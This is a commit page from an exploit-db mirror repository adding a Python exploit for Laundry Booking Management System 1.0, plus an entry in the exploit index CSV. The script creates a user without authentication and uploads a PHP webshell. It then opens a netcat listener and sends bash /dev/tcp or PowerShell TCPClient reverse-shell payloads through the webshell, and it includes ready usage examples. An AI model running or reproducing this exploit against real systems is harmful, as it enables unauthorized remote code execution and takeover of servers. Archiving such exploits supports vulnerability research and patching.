bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-12-01

Browse source 
1 changes to exploits/shellcodes

Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
This commit is contained in:
Offensive Security 2021-12-01 05:02:07 +00:00
parent 897c47e020
commit ebf638ee1a
2 changed files with 136 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

135
exploits/php/webapps/50556.py Executable file
View file

@ -0,0 +1,135 @@
# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
# Date: 29/11/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# Vulnerability: Its possible create an user without being authenticated,
# in this request you can upload a simple webshell which will used to get a
# reverse shell
import re, sys, argparse, requests, time, os
import subprocess, pyfiglet
ascii_banner = pyfiglet.figlet_format("Laundry")
print(ascii_banner)
print(" Booking Management System\n")
print("----[Broken Access Control to RCE]----\n")
class Exploit:
def __init__(self,target, shell_name,localhost,localport,os):
self.target=target
self.shell_name=shell_name
self.localhost=localhost
self.localport=localport
self.LHL= '/'.join([localhost,localport])
self.HPW= "'"+localhost+"'"+','+localport
self.os=os
self.session = requests.Session()
#self.http_proxy = "http://127.0.0.1:8080"
#self.https_proxy = "https://127.0.0.1:8080"
#self.proxies = {"http" : self.http_proxy,
# "https" : self.https_proxy}
self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'}
def create_user(self):
url = self.target+"/pages/save_user.php"
data = {
"fname":"bypass",
"email":"bypass@bypass.com",
"password":"password",
"group_id": "2",
}
#Creates user "bypass" and upload a simple webshell without
authentication
request = self.session.post(url,
data=data,headers=self.headers,files={"image":(self.shell_name
+'.php',"<?=`$_GET[cmd]`?>")})
time.sleep(3)
if (request.status_code == 200):
print('[*] The user and webshell were created\n')
else:
print('Something was wront...!')
def execute_shell(self):
if self.os == "linux":
time.sleep(3)
print("[*] Starting reverse shell\n")
subprocess.Popen(["nc","-nvlp", self.localport])
time.sleep(3)
#Use a payload in bash to get a reverse shell
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
execute_command =
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
try:
request_rce = requests.get(execute_command)
print(request_rce.text)
except requests.exceptions.ReadTimeout:
pass
elif self.os == "windows":
time.sleep(3)
print("[*] Starting reverse shell\n")
subprocess.Popen(["nc","-nvlp", self.localport])
time.sleep(3)
#Use a payload in powershell to get a reverse shell
payload =
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
execute_command =
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
try:
request_rce = requests.get(execute_command)
print(request_rce.text)
except requests.exceptions.ReadTimeout:
pass
else:
print('Windows or linux')
def get_args():
parser = argparse.ArgumentParser(description='Laundry Booking
Management System')
parser.add_argument('-t', '--target', dest="target", required=True,
action='store', help='Target url')
parser.add_argument('-s', '--shell_name', dest="shell_name",
required=True, action='store', help='shell_name')
parser.add_argument('-l', '--localhost', dest="localhost",
required=True, action='store', help='local host')
parser.add_argument('-p', '--localport', dest="localport",
required=True, action='store', help='local port')
parser.add_argument('-os', '--os', choices=['linux', 'windows'],
dest="os", required=True, action='store', help='linux,windows')
args = parser.parse_args()
return args
args = get_args()
target = args.target
shell_name = args.shell_name
localhost = args.localhost
localport = args.localport
xp = Exploit(target, shell_name,localhost,localport,args.os)
xp.create_user()
xp.execute_shell()
#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows
#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux

1
files_exploits.csv
View file

@ -44644,3 +44644,4 @@ id,file,description,date,author,type,platform,port
50553,exploits/multiple/webapps/50553.txt,"orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,

Can't render this file because it is too large.